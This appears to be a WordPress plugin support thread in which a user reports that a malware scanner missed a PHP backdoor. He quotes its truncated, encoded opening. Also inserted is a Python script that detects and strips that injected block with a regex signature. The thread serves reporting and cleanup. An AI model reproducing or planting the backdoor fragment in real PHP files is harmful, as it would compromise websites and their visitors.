• brentontherefore

    (@brentontherefore)


    Running a full scan did not find a known malware which is sprinkled throughout my site. Virus looks like this:

    <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y..
    ZkT8h1Rn1XULdmbqxGU7h1Rn1XULdmbqZV

    EDIT: The developer contacted me immediately after I wrote this review and asked for information on the virus so that he could add it to the database. In fact, he mentioned that he thought that his software already had definitions for something like this, so he was surprised that it didn’t catch it. My suspicion is that my system was infected in a way that prevented his plugin from working properly. Several other plugins also would not scan properly.

    I am increasing my star rating to four due to his quick response and obvious care about this. However, I am not giving five stars because it seems that a system compromised by this virus has ways of preventing the scanner from working at all. In other words, even though it would find it if it could function properly, that does not help if it does not function properly due to the malware. However, I don’t doubt that this is one of the best antimalware plugins available to WordPress. The others I tried also had the same vulnerability.

Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Author Eli

    (@scheeeli)

    Hey Brent,
    Give me a second chance bro

    I have a definition update feature!!! If you send me the rest of that nasty script I will update it immediately and you can clean up any leftovers.

    You can email me directly if you like: eli AT gotmls DOT net

    Thread Starter brentontherefore

    (@brentontherefore)

    I’ve since deleted it, so I don’t have it handy (might be able to find it in a backup) but it was very similar (at least initially) to the one described here: https://blog.sucuri.net/2011/10/evil-backdoors-part-ii.html

    I was able to remove it by creating a PHP script based on this SO question: https://stackoverflow.com/questions/10422503/php-ssh-regex-script-command-to-delete-identical-malware-code-from-many-files

    Hope that helps you figure out how to fight this virus. I will email you the actual virus if I can find it.
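The kind of cleanup script the reply above describes, as an added example that is not part of the original thread or of the linked Stack Overflow answer. It is written in Python so it runs outside PHP and does not depend on the infected site's own code executing. The signature is built from the fragment quoted in the review; the 200-character minimum, the assumption that the injection is one self-contained `<?php ... ?>` block, and all function names are assumptions made here.

```python
import re
from pathlib import Path

# Signature from the fragment quoted in the review: error suppression, an
# isset() guard on a variable, then the same variable assigned a long
# base64-looking string. The 200-character minimum is an assumption.
SIGNATURE = re.compile(
    rb'<\?php\s+@error_reporting\(0\);\s*'
    rb'if\s*\(!isset\(\$(\w+)\)\)\s*\{\s*\$\1\s*=\s*"[A-Za-z0-9+/=]{200,}'
)
# Assumption: the injected code is one self-contained <?php ... ?> block.
BLOCK = re.compile(rb'<\?php\s+@error_reporting\(0\);.*?\?>\s*', re.DOTALL)


def find_infected(root):
    """Return sorted paths of .php files under root that match SIGNATURE."""
    hits = []
    for path in Path(root).rglob("*.php"):
        try:
            if SIGNATURE.search(path.read_bytes()):
                hits.append(path)
        except OSError:
            continue  # unreadable file: skip rather than abort the scan
    return sorted(hits)


def strip_injection(data):
    """Remove the injected block from file bytes; return (cleaned, changed)."""
    m = SIGNATURE.search(data)
    block = BLOCK.match(data, m.start()) if m else None
    if not block:
        return data, False  # no match, or no closing ?>: leave for manual review
    return data[:m.start()] + data[block.end():], True


def clean_tree(root, backup_dir=None):
    """Dry run unless backup_dir is given; then save originals there and rewrite."""
    results = []
    for path in find_infected(root):
        data = path.read_bytes()
        new, changed = strip_injection(data)
        if changed and backup_dir is not None:
            dest = Path(backup_dir) / path.relative_to(root)
            dest.parent.mkdir(parents=True, exist_ok=True)
            dest.write_bytes(data)   # keep the original outside the web root
            path.write_bytes(new)
        results.append((path, changed))
    return results
```

Run `clean_tree` without `backup_dir` first to review what would change, and point `backup_dir` at a location outside the web root.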

    Plugin Author Eli

    (@scheeeli)

    This threat looks very similar to many others that are all defined in my plugin. Did you register my plugin and download the definition updates before you scanned?

    It’s a shame you didn’t contact me before posting your review. I always offer my assistance and add these new variants to my definition update so that everyone else benefits from your discovery.

    Please let me know if you find the whole code. I will add it right away.

  • The topic ‘Did not find known Virus’ is closed to new replies.